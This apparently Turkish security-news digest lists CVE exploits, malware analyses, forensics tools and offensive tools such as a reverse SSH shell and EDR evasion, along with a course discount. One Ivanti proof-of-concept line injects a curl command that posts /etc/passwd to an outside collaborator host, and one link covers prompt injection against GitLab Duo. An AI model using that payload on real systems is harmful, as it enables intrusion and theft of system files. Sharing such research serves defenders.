İbrahim BALOĞLU - Siber Güvenlik Paylaşımları

#exploit 1⃣  CVE-2025-5333: RCE in Broadcom Altiris IRM 2⃣  CVE-2025-32813/32814/32815: Infoblox NetMRI UnauthCI / SQLi / Auth. Bypass 3⃣  CVE-2025-6543: Citrix NetScaler Memory overflow 4⃣  CVE-2025-24985: Windows Fast FAT Driver RCE 5⃣  libxml2: Integer overflow leading to heap-buffer-overflow in xmlRegEpxFromParse 6⃣  CVE-2025-29824: Windows CLFS UaF vulnerability 7⃣  CVE-2025-4919: Corruption via Math Space in Mozilla Firefox 8⃣  CVE-2025-49127: Kafbat UI RCE via JMX Unsafe Deserialization 9⃣  CVE-2025-31651: Apache Tomcat rewrite rule processing component 🔟  CVE-2025-49144: LPE in Notepad++ v8.8.1 Installer

#Malware_analysis 1. RedDirection Malicious Campaign 2. macOS Odyssey Infostealer 3. Trojanized versions PuTTY and WinSCP 4. Zip Smuggling: Utility for creating zip files that smuggle additional data for later extraction + YARA Rule 5. Interlock RAT/NodeSnake 6. Fake Android Money Transfer App 7. Malware in Official GravityForms Plugin

#tools #DFIR 1. KubeForenSys - tool for collecting Kubernetes cluster data and ingesting it into Azure Log Analytics workspace for analysis post-compromise https://github.com/invictus-ir/KubeForenSys 2. FindOldSIDTraces - cross-platform tool to find traces of old SIDs remaining in LDAP objects of the AD https://github.com/TheManticoreProject/FindOldSIDTraces 3. Forensic journey: Breaking down the UserAssist artifact structure https://securelist.com/userassist-artifact-forensic-value-for-incident-response/116911 ]-> UserAssist Parser

CVE-2025-47176 * Microsoft Outlook - Remote Code Execution * ./POC

#tools #Offensive_security 1. reverse_ssh - SSH based reverse shell 2. Wsuks - Automating the MITM attack on WSUS 3. Shell as root - Exploiting an SSRF vulnerability on the HTB Down machine 4. Dirty Vanity in Rust

#DFIR 1. PowerShell script to collect memory and disk forensics for DFIR investigations https://github.com/dwmetz/CyberPipe 2. Stealth Syscall Execution: Bypassing ETW, Sysmon, and EDR Detection https://www.darkrelay.com/post/stealth-syscall-execution-bypass-edr-detection 3. Analysis of a suspicious binary found in MicroDicom Viewer installer https://github.com/darnas11/MicroDicom-Incident-Report

#Kernel_Security #Offensive_security 1. Exploiting UAF in vsock subsystem of the Linux kernel (CVE-2025-21756) https://github.com/google/security-research/blob/f7dbb569a8275d4352fb1a2fe869f1afa79d4c28/pocs/linux/kernelctf/CVE-2025-21756_lts_cos/docs/exploit.md 2. Secure Enclaves for Offensive Operations Part 1, Part 2

Gelen indirim isteklerine özel bu hafta boyunca Siber Olaylara Müdahale Eğitimini %50 indirimli olarak satın alabilirsiniz. 🔥

https://www.udemy.com/course/siber-olaylara-mudahale-egitimi-windows-forensics/?couponCode=AB06AD91EEA6097CF368

Ivanti Decrypt Stored SQL POC

https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx

#Malware_analysis 1. Malicious Chrome Extensions https://dti.domaintools.com/dual-function-malware-chrome-extensions 2. Simple SSH Backdoor https://isc.sans.edu/diary/Simple+SSH+Backdoor/32000 3. Malicious VS Code Extensions https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions

#exploit #Threat_Research 1. Multiple CVEs in Infoblox NetMRI: RCE, Auth Bypass, SQLi, and File Read Vulnerabilities https://rhinosecuritylabs.com/research/infoblox-multiple-cves 2. Don't Call That "Protected" Method: Dissecting an N-Day vBulletin RCE https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce 3. Remote Prompt Injection in GitLab Duo https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo